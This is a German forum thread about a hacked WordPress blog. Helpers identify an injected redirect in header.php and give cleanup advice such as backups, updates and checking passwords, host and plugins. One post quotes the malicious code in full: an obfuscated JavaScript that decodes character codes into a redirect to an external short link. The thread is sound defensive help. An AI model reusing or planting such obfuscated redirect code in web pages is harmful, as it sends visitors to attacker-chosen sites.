Wordpress gehackt und Umleitung eingebaut

[RandyFisher]

Offensichtlich hat heute irgendjemand meinen Blog gehackt und dort eine Umleitung eingebaut. Ich gehe davon aus, dass da irgendwas an der SQL-DB veranstaltet wurde. Ich hoffe, ihr könnt mir helfen, das wieder zu ändern.

RandyFisher’s Blog

[codestyling]

Schau in deine header.php und wirf das raus, ist eine Javascript Weiterleitung:

Code:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

Teste danach ob der Blog wieder geht und dann sag Bescheid, dann sehen wir weiter.

PS: Avira meint bei ausgeschaltetem Javascript im Fox -> HTML/crypted.gen gefunden.

[RandyFisher]

Hab den JavaScript rausgeworfen. Blog geht wieder. Erstaunlicherweise hatte Antivir sogar den "Scriptvirus" gemeldet, aber das soll mal nebensächlich sein.

Am besten mach ich gleich mal ein WP-Update. Sonst noch irgendwas, das ich tun sollte?
Kategorien und Links sind übrigens verschwunden.

Und vielen Dank, wäre von selbst nicht darauf gekommen, wo das versteckt ist.

[codestyling]

Ja, trotzdem vorher ein Backup der Datenbank machen und dann erst updaten. Nur für den Fall, das noch irgendwas nach dem Update nicht will und zerspielt wurde.

[RandyFisher]

Bereits geschehen. Das war eh das erste, was ich machte, bevor ich anfing, an irgendwas rumzuspielen.

Kurze Frage noch: Wie konnte das passieren, dass jemand einen JavaScript dort hineinschreibt? Ich würde nämlich gern verhindern, dass das nochmal passiert.

[LastOne]

Welche Wordpress Version hast du denn bisher genutzt?

Gibt verschiedene Möglichkeiten:
Wie sicher ist dein Passwort?
Welche WP Version?
Wer ist dein Hoster? Ev. sind sie darüber eingedrungen...
Welche Plugins?

[heide]

Hallo zusammen,

leider ist mein Blog ebenfalls gehackt worden. Anders als Randy bin ich aber Technik-Legasthenikerin und brauche fachkundige Hilfe, um das Ganze zu beheben . Das Blog ist vom Netz, aber wie ich jetzt ein Backup mache und meine Daten wieder säubere, überfordert mich leider. Meine vorsichtige Suche nach der header.php (über Cyberduck und TextWrangler) hat mich leider nicht zum gewünschten Punkt geführt, und ich würde mich sowieso nicht trauen, einfach so was zu löschen.

Also, wer Ahnung hat, sende mir bitte eine PM mit Honorarvorstellungen. Ich hätte mein Blog schon gerne bald wieder in alter Schönheit am Netz .

Danke und viele Grüße
Heide

[Herr Schmidt]

geht auch ohne Kohle, wenn du mal den Link postest + das Teil vielleicht unter einer anderen URL wieder online stellst

[heide]

Siehst Du, da geht's schon los. Die URL lautet www.heide-liebmann.de/blog, aber das lässt sich ja nicht aufrufen. Und wie ich das unter einer anderen URL machen soll - keine Ahnung. Vom Netz genommen hat das heute morgen der Mensch, bei dem das Ganze auf dem Server liegt.

Tut mir leid, ich bin da wirklich überfordert.

[LastOne]

Na ja, bei wem lässt du den hosten? und wie hast du es eingerichtet?